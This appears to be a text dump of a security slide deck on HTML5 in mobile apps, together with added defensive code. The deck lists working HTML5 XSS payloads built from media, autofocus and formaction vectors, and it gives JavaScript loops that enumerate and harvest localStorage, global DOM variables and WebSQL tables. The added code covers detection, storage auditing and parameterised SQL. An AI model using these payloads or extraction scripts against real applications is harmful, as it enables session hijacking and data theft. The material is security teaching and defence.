html5 on mobile
© Blueinfy Solutions
HTML5 and Mobile
What is HTML5
• Enhancement to HTML 4.01
  – with more tags
  – API support
  – Functionality to support mobile devices
  – More types for existing tags
• Does not mean old tags will not work
• An existing application can be converted by changing its first line to “<!DOCTYPE html>”
HTML5 in Mobile
• It is changing the game
• Apps are migrating to HTML5 and no longer need to use native code
• Web vs. Mobile
  – Both can use HTML5
  – No need to manage several code bases
  – HTML+CSS+JS only
  – Server side services
Technology Vectors
What is running - where? (diagram)
Server side components: Presentation Layer, Business Layer, Data Access Layer, Authentication, Communication etc., running on Runtime, Platform and Operating System Components
Client side components (Browser): HTML 5, DOM, XHR, WebSocket, Storage, WebSQL, Flash, Flex, AMF, Silverlight, WCF, XAML, .NET, Storage, JS, Android, iPhone/iPad, Other Mobile
HTML5 in nutshell - Specs
Source: http://en.wikipedia.org/wiki/File:HTML5-APIs-and-related-technologies-by-Sergey-Mavrody.png
Source: http://html5demos.com/
Evolution going on by Web Hypertext Application Technology Working Group (WHATWG)
Key HTML5 features for Mobile
• Offline web application support
• Web Storage
• GeoLocation API
• Canvas 2D Drawing
• Video and Audio streaming support
HTML5 features not supported on Mobile
• Microdata
• 3D animation
• FileReader API
• IndexedDB
• WebWorkers
Modern Browser Model (diagram)
Presentation: HTML5 + CSS | Silverlight | Flash
Process & Logic: JavaScript | DOM/Events | Parser/Threads
Network & Access: XHR 1 & 2 | WebSocket | Plug-in Sockets
Core Policies: SOP/CORS/Content-Sec | Sandbox
Browser Native | Network Services
API (Media, Geo etc.) & Messaging | Plug-In
Mobile: Storage / WebSQL | Cache / FileSystem
Abusing HTML 5 Tags
• Various new tags can be abused; they may not be filtered or validated
• Media tags
  <video poster=javascript:alert(document.cookie)//
  <audio><source onerror="javascript:alert(document.cookie)">
• Form tags
  <form><button formaction="javascript:alert(document.cookie)">foo
  <body oninput=alert(document.cookie)><input autofocus>
Accessing media tags
Moving/Touch
Login cookie
Profile
• Fetch through storage – cookie not needed…
WebSQL data
• Through JavaScript one can store information in a database.
• Example
One time fetch
Network calls
• HTML 5 provides WebSocket and XHR Level 2 calls
• These allow cross-domain calls and raw socket capabilities
• They can be leveraged by a JavaScript payload
• Malware or a worm can use them to perform several scanning tasks
Same Origin Policy (SOP)
• Browser’s sandbox
  – Protocol, host and port should match
  – It is possible to set document.domain to the parent domain if the current context is a child domain
  – Top level domain (TLD) locking down helps in sandboxing the context
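The two rules on this slide, written out as code. This is an added example, not the slides' own material: origin comparison uses Node's URL class, and PUBLIC_SUFFIXES is a constructed, deliberately short stand-in for the Public Suffix List that browsers consult when they refuse to let a page set document.domain to a TLD.

```javascript
// Added example (not from the slides). PUBLIC_SUFFIXES is a constructed
// stand-in for the real Public Suffix List.
const PUBLIC_SUFFIXES = new Set(['com', 'org', 'net', 'co.uk']);

// An origin is the (protocol, host, port) triple. URL drops default ports,
// so https://a.example.com and https://a.example.com:443 compare equal.
function sameOrigin(urlA, urlB) {
  const a = new URL(urlA);
  const b = new URL(urlB);
  return a.protocol === b.protocol && a.hostname === b.hostname && a.port === b.port;
}

// A page may relax document.domain only to itself or to a parent (suffix)
// domain of its own host, and never to a public suffix / TLD.
function canRelaxDomainTo(currentHost, target) {
  const cur = currentHost.toLowerCase();
  const tgt = target.toLowerCase();
  if (PUBLIC_SUFFIXES.has(tgt)) return false;   // TLD lock-down
  if (tgt === cur) return true;
  return cur.endsWith('.' + tgt);               // must be a parent domain
}

// Constructed URLs for illustration.
const checks = {
  defaultPort: sameOrigin('https://app.example.com/a', 'https://app.example.com:443/b'),
  schemeDiffers: sameOrigin('https://app.example.com/', 'http://app.example.com/'),
  portDiffers: sameOrigin('https://app.example.com/', 'https://app.example.com:8443/'),
  relaxToParent: canRelaxDomainTo('shop.example.com', 'example.com'),
  relaxToTld: canRelaxDomainTo('shop.example.com', 'com'),
};
```

Two sub-domains that both set document.domain to the shared parent can then script each other, which is why the TLD rule matters: without it any site under the same public suffix could opt into the same relaxed origin.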
Fetching Location
Location calls
Hybrid App
• Android
Integrating native to webview
• Hook your handlers to make it hybrid
• Interact with the webview
Set permissions
• Manifest file
Loading Hybrid App
Slidebar type touch views
HTML5 Attacks
Modern Browser Model (diagram, repeated from above) – attack surface highlighted: XSS with HTML5 (tags, attributes and events)
HTML5 – Tags/Attributes/Events
• Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys)
• Attributes – form, submit, autofocus, sandbox, manifest, rel etc.
• Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc.
XSS variants
• Media tags
• Examples
  – <video><source onerror="javascript:alert(1)">
  – <video onerror="javascript:alert(1)"><source>
XSS variants
• Exploiting autofocus
  – <input autofocus onfocus=alert(1)>
  – <select autofocus onfocus=alert(1)>
  – <textarea autofocus onfocus=alert(1)>
  – <keygen autofocus onfocus=alert(1)>
XSS variants
• Form & Button etc.
  – <form id="test" /><button form="test" formaction="javascript:alert(1)">test
  – <form><button formaction="javascript:alert(1)">test
• Etc … and more …
  – Nice HTML5 XSS cheat sheet (http://html5sec.org/)
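The vectors on the last three slides share three ingredients: an event handler attribute, autofocus (which fires onfocus without any user action), or a javascript: URL in an attribute the browser treats as a link (formaction, poster, src, href, action). The rule set below, an added example and not code from the slides, classifies the attributes of a single start tag accordingly. It is meant as the decision logic behind an output filter or a log-scanning detector, not a full HTML parser; the sample tags are the slides' own payloads plus constructed benign ones.

```javascript
// Added example (not from the slides): flag the HTML5 attribute-level XSS
// vectors the deck lists. Single-tag classifier, not an HTML parser.

// Attributes whose value is interpreted as a URL and can carry javascript:
const URL_ATTRS = new Set(['href', 'src', 'action', 'formaction', 'poster', 'data']);

// name, then optionally = "quoted" | 'quoted' | unquoted (unquoted runs to whitespace or '>')
const ATTR_RE = /([^\s"'>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;

// Browsers discard tab/newline and leading control characters from a URL
// before matching the scheme, so strip them before looking for javascript:
function schemeOf(value) {
  const cleaned = value.replace(/[\x00-\x20]/g, '').toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(cleaned);
  return m ? m[1] : null;
}

function dangerReason(name, value) {
  const n = name.toLowerCase();
  if (n.startsWith('on')) return 'event handler attribute';
  if (n === 'autofocus') return 'autofocus fires onfocus without user interaction';
  if (URL_ATTRS.has(n) && value !== undefined) {
    const scheme = schemeOf(value);
    if (scheme === 'javascript' || scheme === 'vbscript') return 'script-bearing URL';
  }
  return null;
}

// Returns [{name, reason}] for every dangerous attribute in one start tag.
function dangerousAttributes(tag) {
  const head = /^<\s*([a-zA-Z][\w-]*)([\s\S]*)$/.exec(tag);
  if (!head) return [];
  const findings = [];
  for (const m of head[2].matchAll(ATTR_RE)) {
    const value = m[2] ?? m[3] ?? m[4];
    const reason = dangerReason(m[1], value);
    if (reason) findings.push({ name: m[1].toLowerCase(), reason });
  }
  return findings;
}

// Tags from the slides, plus constructed benign ones.
const samples = [
  '<video poster=javascript:alert(document.cookie)//',
  '<source onerror="javascript:alert(document.cookie)">',
  '<input autofocus onfocus=alert(1)>',
  '<button form="test" formaction="javascript:alert(1)">',
  '<input type="text" name="q">',
  '<a href="https://example.com/">',
];
const report = samples.map((t) => ({ tag: t, findings: dangerousAttributes(t) }));
```

An allow-list filter that drops every attribute for which dangerReason returns a value, and additionally restricts the URL attributes to http/https, covers every payload on these slides; a deny-list of tag names does not, because the media and form tags here are legitimate markup whose attributes carry the script.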
Extraction through XSS
• Once you have an entry point – game over!
Modern Browser Model (diagram, repeated from above) – attack surface highlighted: Web Storage and DOM information extraction
Web Storage Extraction
• Traditionally the browser had one place to store data – the cookie (limited in size and replayed with every request)
• HTML5 – Storage API provided (Local and Session)
• Can hold global scoped variables
• http://www.w3.org/TR/webstorage/
Web Storage Extraction
• It is possible to steal them through XSS or via JavaScript
• Session hijacking – HttpOnly is of no use here
• getItem and setItem calls
• XSS the box and scan through storage
Blind storage enumeration
  if (localStorage.length) {
    console.log(localStorage.length);          // number of stored keys
    for (var i in localStorage) {              // stored key names are enumerable properties
      console.log(i);                          // key
      console.log(localStorage.getItem(i));    // value
    }
  }
• The above code extracts every storage variable
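Because anything in Web Storage is readable by any script running in the origin, the defensive counterpart to the enumeration above is an audit that tells developers what their own app has put there. The helper below is an added example, not the slides' code: it walks a Storage object through the standard length / key(i) / getItem API and flags entries whose key name or value shape suggests a credential. The Storage-like object and its values are constructed for offline testing; in a browser you would pass window.localStorage directly.

```javascript
// Added example (not from the slides): audit a Web Storage object for values
// that should not live in storage. makeStorage() is a constructed stand-in
// for window.localStorage exposing the same read API.

const SENSITIVE_KEY = /token|session|passw|secret|auth|jwt|api[_-]?key/i;
const JWT_SHAPE = /^[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}$/;
const TOKEN_SHAPE = /^[A-Za-z0-9+/=_-]{32,}$/;   // long hex/base64 run, no spaces

// Use the Storage API rather than for...in so the walk does not depend on
// which properties happen to be enumerable.
function auditStorage(storage) {
  const findings = [];
  for (let i = 0; i < storage.length; i++) {
    const key = storage.key(i);
    const value = storage.getItem(key) || '';
    const reasons = [];
    if (SENSITIVE_KEY.test(key)) reasons.push('sensitive key name');
    if (JWT_SHAPE.test(value)) reasons.push('value looks like a JWT');
    if (TOKEN_SHAPE.test(value)) reasons.push('token-shaped value');
    if (reasons.length) findings.push({ key, reasons });
  }
  return findings;
}

// Constructed stand-in for window.localStorage.
function makeStorage(entries) {
  const keys = Object.keys(entries);
  return {
    get length() { return keys.length; },
    key: (i) => keys[i],
    getItem: (k) => (k in entries ? entries[k] : null),
  };
}

// Constructed sample contents; the token and JWT values are placeholders.
const sampleStorage = makeStorage({
  theme: 'dark',
  lang: 'en-GB',
  sessionToken: 'a9f3c2d1e8b7f6a5c4d3e2f1a0b9c8d7',
  cart: '[{"sku":"123","qty":2}]',
  profileCache: 'eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1c2VyLTEyMyJ9.c2lnbmF0dXJlLXBsYWNlaG9sZGVyLXNpZw',
});

function auditSample() {
  return auditStorage(sampleStorage);
}
```

Running auditSample() reports sessionToken (sensitive key name, token-shaped value) and profileCache (value looks like a JWT) and nothing for theme, lang or cart. The fix for a finding is to move the secret back into an HttpOnly cookie or keep it server-side, since no Web Storage setting can hide it from injected script.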
File System Storage
• HTML5 provides a virtual file system with filesystem APIs
  – window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem;
• It becomes a full blown local file system for the application, inside the sandbox
• It empowers the application
File System Storage
• It provides a temporary or permanent file system
  var filesys;                                   // handle kept for later reads and writes
  function catcherror(e) { console.error(e); }   // error callback
  function init() {
    // Request a 1 MB temporary file system for this origin
    window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) {
      filesys = filesystem;
    }, catcherror);
  }
• The app can have a full filesystem in place now.
Sensitive information filesystem
• Assuming the app is creating a profile on the local system
DOM Storage
• Applications run with a “rich” DOM
• JavaScript sets several variables and parameters while loading – GLOBALS
• They hold sensitive information – what if they are GLOBAL and remain for the life of the application?
• They can be retrieved with XSS
• HTTP requests and responses go through JavaScript (XHR) – what about those vars?
Blind Enumeration
  for (var i in window) {
    var obj = window[i];
    try {
      if (typeof obj == "string") {     // only string-valued globals
        console.log(i);                 // global name
        console.log(obj.toString());    // its value
      }
    } catch (ex) {}                     // skip properties that throw on access
  }
Global Sensitive Information Extraction from DOM
• HTML5 apps run on a single DOM
• Having several key global variables, objects and arrays
  – var arrayGlobals = ['[email protected]', "12141hewvsdr9321343423mjfdvint", "test.com"];
• Post DOM-based exploitation is possible, harvesting all these values.
Global Sensitive Information Extraction from DOM
  for (var i in window) {
    var obj = window[i];
    if (obj != null) {                          // skips both null and undefined
      var type = typeof obj;
      if (type == "object" || type == "string") {
        console.log("Name:" + i);
        try {
          var my = JSON.stringify(obj);         // throws on cyclic objects such as window itself
          console.log(my);
        } catch (ex) {}
      }
    }
  }
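The enumeration on the last few slides works because the values are properties of the global object. The added example below (not the slides' code) puts the same walk against two ways of holding the same application state: globals, and a closure that exposes only the API. "win" is a constructed stand-in for window so the code runs outside a browser; the e-mail, session id and host are constructed placeholders.

```javascript
// Added example (not from the slides). "win" stands in for window; values are
// constructed placeholders.

// Pattern 1: state kept in globals, which the slides warn about. Any script
// that runs in the page can read it by enumerating the global object.
function buildLeakyApp(win) {
  win.userEmail = 'user@example.com';
  win.sessionId = 'constructed-session-id-0123456789';
  win.apiHost = 'api.example.com';
  return { whoAmI: () => win.userEmail };
}

// Pattern 2: state held in a closure. Same functionality, but the values are
// not properties of the global object, so a window walk does not see them.
function buildScopedApp(win) {
  const state = {
    userEmail: 'user@example.com',
    sessionId: 'constructed-session-id-0123456789',
    apiHost: 'api.example.com',
  };
  win.app = { whoAmI: () => state.userEmail };   // only the API is global
  return win.app;
}

// The deck's enumeration, reduced to: collect every string-valued property
// reachable directly on the global object.
function enumerateGlobalStrings(win) {
  const found = {};
  for (const name in win) {
    try {
      const value = win[name];
      if (typeof value === 'string') found[name] = value;
    } catch (e) { /* cross-origin or getter errors: skip */ }
  }
  return found;
}

function demoGlobals() {
  const leakyWin = {};
  buildLeakyApp(leakyWin);
  const scopedWin = {};
  const scopedApp = buildScopedApp(scopedWin);
  return {
    leaky: enumerateGlobalStrings(leakyWin),     // three strings, session id included
    scoped: enumerateGlobalStrings(scopedWin),   // nothing
    scopedStillWorks: scopedApp.whoAmI(),        // API unaffected
  };
}
```

Closure scoping does not stop an injected script that already runs in the page from calling app.whoAmI(), so it narrows what a blind walk harvests rather than removing the XSS risk; the entry point still has to be closed.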
SQL Injection
• WebSQL is part of the HTML 5 specification; it provides an SQL database inside the browser itself.
• Allows one-time data loading and offline browsing capabilities.
• Raises security concerns and creates potential injection points.
• Its methods and calls are exposed to page JavaScript
SQL Injection
• Through JavaScript one can harvest entire local database.
• Example
Blind WebSQL Enumeration
• We need the following to exploit
  – Database object
  – Table structure created on SQLite
  – User table on which we need to run the select query
Blind WebSQL Enumeration
  var dbo;        // the application's Database object, once found
  var table;      // result set from sqlite_master
  var usertable;  // name of the first application table
  for (var i in window) {
    var obj = window[i];
    try {
      if (obj.constructor.name == "Database") {
        dbo = obj;
        obj.transaction(function(tx) {
          tx.executeSql('SELECT name FROM sqlite_master WHERE type=\'table\'', [],
            function(tx, results) {
              table = results;
              // executeSql is asynchronous, so the name must be read here in
              // the callback; reading it after the loop would find table undefined
              if (table.rows.length > 1) usertable = table.rows.item(1).name;
            }, null);
        });
      }
    } catch (ex) {}
  }
Blind WebSQL Enumeration
• We run through all window objects and pick the one whose constructor is “Database”
• We issue a SELECT query directly against sqlite_master
• We grab the 1st table, leaving the WebKit table at the 0th entry
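The injection point these slides refer to is the same one as on the server: user input concatenated into the text passed to executeSql. The added example below (not the slides' code) shows the vulnerable and the parameterised form side by side, plus a guard a code base can wrap around executeSql to keep callers on placeholders. openDatabase is not available outside a browser, so recordingTx is a constructed stand-in that records what executeSql would receive; the table name "profile" is assumed for illustration.

```javascript
// Added example (not from the slides). recordingTx is a constructed stand-in
// for a WebSQL SQLTransaction; "profile" is an assumed table name.

// Vulnerable pattern: user-controlled input concatenated into the SQL text.
function lookupUnsafe(tx, username) {
  const sql = "SELECT * FROM profile WHERE name = '" + username + "'";
  tx.executeSql(sql, [], () => {}, () => {});
}

// Hardened pattern: constant SQL text, value passed as a bound parameter, so
// SQLite treats it purely as data whatever characters it contains.
function lookupSafe(tx, username) {
  tx.executeSql('SELECT * FROM profile WHERE name = ?', [username], () => {}, () => {});
}

// Guard for a wrapper around executeSql: refuse any statement that embeds a
// quoted literal. An assumed project convention, not a WebSQL feature.
function assertParameterised(sql) {
  if (/'[^']*'/.test(sql)) throw new Error('quoted literal in SQL; use ? placeholders');
  return sql;
}

// Records the (sql, args) pairs a transaction would have executed.
function recordingTx() {
  const calls = [];
  return {
    calls,
    executeSql(sql, args, onSuccess, onError) { calls.push({ sql, args }); },
  };
}

function demoWebSql() {
  const input = "x' OR '1'='1";   // constructed injection-style input
  const unsafe = recordingTx();
  lookupUnsafe(unsafe, input);
  const safe = recordingTx();
  lookupSafe(safe, input);
  let guardTripped = false;
  try { assertParameterised(unsafe.calls[0].sql); } catch (e) { guardTripped = true; }
  assertParameterised(safe.calls[0].sql);   // passes: no literal in the text
  return {
    unsafeSql: unsafe.calls[0].sql,   // the WHERE clause has been rewritten by the input
    safeSql: safe.calls[0].sql,
    safeArgs: safe.calls[0].args,
    guardTripped,
  };
}
```

Parameterisation closes the injection point but not the extraction shown on the previous slides: an injected script can still open the database and read it through the same API, so the data kept in WebSQL should be treated as readable by any script in the origin.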
Blind WebSQL Enumeration
Conclusion